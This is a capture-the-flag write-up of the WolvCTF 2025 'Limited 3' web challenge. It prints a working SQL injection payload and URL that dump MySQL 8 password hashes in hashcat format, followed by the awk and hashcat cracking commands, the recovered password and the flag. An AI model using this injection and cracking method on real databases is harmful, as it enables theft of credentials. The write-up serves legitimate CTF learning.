📊 Challenge Overview

Category	Details	Additional Info
🏆 Event	WolvCTF - 2025	Event Link
🔰 Category	Web	🌐
💎 Points	483	Out of 500 total
⭐ Difficulty	🟢 Easy	Personal Rating: 3/10
👤 Author	SamXML	Profile
🎮 Solves (At the time of flag submission)	21	solve rate
📅 Date	23-03-2025	WolvCTF - 2025
🦾 Solved By	mH4ck3r0n3	Team: QnQSec

📝 Challenge Information

Note: This uses the same source as Limited 1. There is a db user named: flag The password for this user is 13 characters and can be found in rockyou. Please wrap this password with wctf{} before submitting. For example, if the password was hocuspocus123 then the flag would be wctf{hocuspocus123} https://limited-app-974780027560.us-east5.run.app/

🎯 Challenge Files & Infrastructure

Provided Files

Files:

•  Attached Files

🔍 Initial Analysis

First Steps

This is the third challenge of the Limited series, so for the explanations and analysis, refer to the previous two writeups (Limited 1, Limited 2). Let’s move directly to the exploitation phase.

🔬 Vulnerability Analysis

Potential Vulnerabilities

• SQL Injection

🎯 Solution Path

Exploitation Steps

Initial setup

I must admit, after many attempts at extracting the password and cracking trials (which didn’t go well), since it was impossible to crack if the format wasn’t correct… I found a query in the hashcat_wiki that allows you to correctly extract MySQL passwords to make them compatible with hashcat’s -m 7401 type. Let’s move on to the next phase.

Exploitation

I modified the initial query from the other challenges, adapting it to the one found on the hashcat_wiki, forming the final payload:

1

*/ 1 UNION SELECT 1, 1, CONCAT(user, '|$mysql', SUBSTR(authentication_string,1,3), LPAD(CONV(SUBSTR(authentication_string,4,3),16,10),4,0), '*', INSERT(HEX(SUBSTR(authentication_string,8)),41,0,'*')), 1 FROM mysql.user WHERE plugin='caching_sha2_password' AND authentication_string NOT LIKE '%INVALIDSALTANDPASSWORD%' --

Then, I constructed the following link: https://limited-app-974780027560.us-east5.run.app/query?price=10.00&price_op=< /*&limit=*/ 1 UNION SELECT 1, 1, CONCAT(user, '|$mysql', SUBSTR(authentication_string,1,3), LPAD(CONV(SUBSTR(authentication_string,4,3),16,10),4,0), '*', INSERT(HEX(SUBSTR(authentication_string,8)),41,0,'*')), 1 FROM mysql.user WHERE plugin='caching_sha2_password' AND authentication_string NOT LIKE '%INVALIDSALTANDPASSWORD%' -- . Visiting the page:

I found the password hashes (in the correct format for hashcat). Then, since the challenge description mentioned that cracking could be done with the rockyou.txt wordlist and that the password is 13 characters long, I filtered the rockyou.txt file to only include passwords of 13 characters using the awk command:

1	awk 'length($0) == 13' /usr/share/wordlists/rockyou.txt > rockyou13.txt

I saved the hash corresponding to the user flag in a file called hash.txt and ran hashcat:

1	hashcat hash.txt rockyou13.txt

After waiting a few seconds, I obtained the plaintext password: maricrissarah. Finally, I formatted it in the flag format (wctf{maricrissarah}).

Flag capture

🛠️ Exploitation Process

Approach

The automatic exploit literally performs all the previously described steps, including cracking the password and ultimately printing only the flag.

•  Exploit

🚩 Flag Capture

Flag

wctf{maricrissarah}

Proof of Execution

Screenshot of successful exploitation

🔧 Tools Used

Tool	Purpose
Python	Exploit
HashCat	Password Cracking

💡 Key Learnings

Time Optimization

• When extracting MySQL > 8 hashes, always use the query from HashCat to extract them, so that they are compatible with -m 7401 if the format is not standard.

Skills Improved

• Binary Exploitation
• Reverse Engineering
• Web Exploitation
• Cryptography
• Forensics
• OSINT
• Miscellaneous

📚 References & Resources

Official Documentation

• https://hashcat.net/wiki/doku.php?id=example_hashes

Similar Challenges

• Limited 1
• Limited 2

Learning Resources

• https://portswigger.net/web-security/sql-injection

📊 Final Statistics

Created: 23-03-2025 • Last Modified: 23-03-2025 Author: mH4ck3r0n3 • Team: QnQSec